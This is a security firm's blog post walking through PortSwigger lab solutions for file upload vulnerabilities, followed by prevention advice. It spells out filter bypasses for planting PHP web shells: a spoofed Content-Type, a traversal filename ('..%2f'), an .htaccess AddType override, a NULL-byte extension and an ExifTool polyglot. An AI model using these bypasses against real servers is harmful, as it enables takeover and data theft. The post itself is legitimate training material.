Methods For Exploiting File Upload Vulnerabilities

This blog post was published on PurpleBox website on July 20th, 2022.

What Are File Upload Vulnerabilities?

Before we discuss how to exploit file upload vulnerabilities, it’s important to have a basic understanding of what the file upload functions are. File upload functions allow users to upload a file to the web server’s file system. File upload functions may have certain rules (for example only JPG files are allowed to upload). So what happens if we manage to upload a PHP file to the web server with a file upload function that only accepts JPG? This is where file upload vulnerabilities arise.

How Dangerous Are File Upload Vulnerabilities?

The impact of file upload vulnerabilities depends on a few key factors.

• In some cases, the website can fail to properly validate the uploaded file’s type and content. This allows attackers to upload a file containing server-side code (web shell). This could end up giving the attacker control over the server, which is extremely dangerous.
• If the website fails to validate an uploaded file’s name, the attacker can overwrite critical files by uploading a file with the same name. If the server is also vulnerable to directory traversal, the attacker can overwrite a file from unanticipated locations (for example apache2.conf).
• If the website fails to properly validate the uploaded file’s size, attackers can rapidly fill available disk space. This is a type of DoS attack.

How To Exploit File Upload Vulnerabilities?

In this section, we will discuss “How to Exploit File Upload Vulnerabilities” step-by-step with several helpful examples.

The example cases used in this post are lab environments from PortSwigger.

1. Basic Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can then log in to your own account using the following credentials: wiener:peter.

Step #1: We are now logged in as user wiener and looking for the file upload function in the application.

Step #2: We have located a file upload function in the user’s profile.

Step #3: After locating the file upload function, we create a PHP file that contains the code in the screenshot below, allowing us to view the secrets of the user “Carlos”.

Step #4: Now we can upload the PHP file that we created earlier.

Step #5: Now we need to force the webserver to run this file. To do this, we must make a GET request to the file that we uploaded before. We can view the uploaded folder endpoint in the screenshot above (/files/avatars/file_upload_test.php). Make the request and read the secret of the user “Carlos”.

Step #6: Submit the flag and the lab is solved!

Note: We are not going to show the main application and lab solved page in the other sections.

2. Web Shell Upload via Content-Type Restriction Bypass

Condition: To solve this lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We’ve found the same file upload function and tried to upload the same PHP file. Unfortunately, the application has a content-type restriction.

Step #2: We recognized the application only allows image/jpeg and image/png content types. So we changed the content type to the image/jpeg and the file was successfully uploaded to the /avatars/file_upload.php endpoint.

Step #3: Let’s now make a GET request for the file that we uploaded before. Read the secret of the user “Carlos”.

3. Web Shell Upload via Directory Traversal

Condition: To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: As seen in previous examples, the first step is inspecting the file upload function. After inspecting the function, we recognized that there is no restriction for uploading a PHP file to the server.

Step #2: But when we make a GET request to our uploaded PHP file, the server returned the contents of the PHP file as plain text.

Step #3: After trying some bypass techniques, we realized that we can simply upload our PHP file via directory traversal. Now we just need to change the filename from file_upload_test.php to ..%2ffile_upload_test.php. After the change, we can now see that the file was successfully uploaded to the /files directory (the parent directory of /avatars).

Step #4: Now, if we make a GET request to /files/avatars/../file_upload_test.php endpoint, we can access the secret of the user “Carlos”. We can also access the file using a GET request to /files/file_upload_test.php endpoint.

4. Web Shell Upload via Blacklisted Extension Bypass

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

Step #1: We can use the same file upload function for the exploitation process. We can now see the error message in the HTTP response body. This means that PHP files are not allowed.

Step #2: After a few tries we found a way to bypass the blacklist restriction. In this case, we will use what we learned in the previous examples. First, we need to upload and overwrite the .htaccess file for uploading the extensions that we wanted to upload. So we will change the filename to .htaccess and change the content to AddType application/x-httpd-PHP .prplbx

Step #3: After this step, we can now upload our PHP file with the .prplbx extension.

Step #4: Now we can access the secret of the user “Carlos” as we did before. The difference is, this time we will make a GET request to file_upload_test.prplbx instead of file_upload_test.php .

5. Web Shell Upload via Obfuscated File Extension

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We can use the same file upload function for the exploitation process. We can see the error message in the HTTP response body. The PHP files are not allowed. Only JPG and PNG files are allowed.

Step #2: After a few tries we found a successful method. We can obfuscate the filename, if we add a NULL byte and an allowed extension to the filename, we can bypass the restriction.

Step #3: Now we can access the secret of the user Carlos as usual.

6. Remote Code Execution via Polyglot Web Shell Upload

Condition: To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter.

Step #1: We can use the same file upload function for the exploitation process. We can see the error message in the HTTP response body. The PHP files are not allowed. Only JPG and PNG files are allowed.

Step #2: Now we can add a PHP payload to the valid image file using ExifTool to bypass the restriction.

Step #3: After the creation step, we can now upload our new PHP file.

Step #4: Now we can access the secret of the user “Carlos” as usual.

How To Prevent File Upload Vulnerabilities?

The most effective way is to implement all of the following practices:

Compare the file extension with the whitelist of allowed extensions rather than the blacklist of prohibited ones. It is much easier to guess which extensions you might want to allow, rather than the ones an attacker might try to upload. Make sure the filename doesn’t contain any substrings that may be accidentally interpreted as a directory or traversal sequence (../). Rename uploaded files to avoid collisions that may cause existing files to be overwritten. Do not upload files to the server’s filesystem until they have been fully validated. Whenever possible, use an established framework for preprocessing file uploads rather than attempting to write your own validation mechanisms.

Conclusion

In this blog post, we talked about what file upload vulnerabilities are and their potential damage to systems. We have also explained methods for exploiting file upload vulnerabilities and ways to prevent file upload vulnerabilities.

We hope you found our blog post useful and it will help you to make secure file uploads in the future. Don’t forget to check out our Penetration Testing services to stay secure!

If you want to read more on this topic, feel free to check out the PurpleBox Blog Section.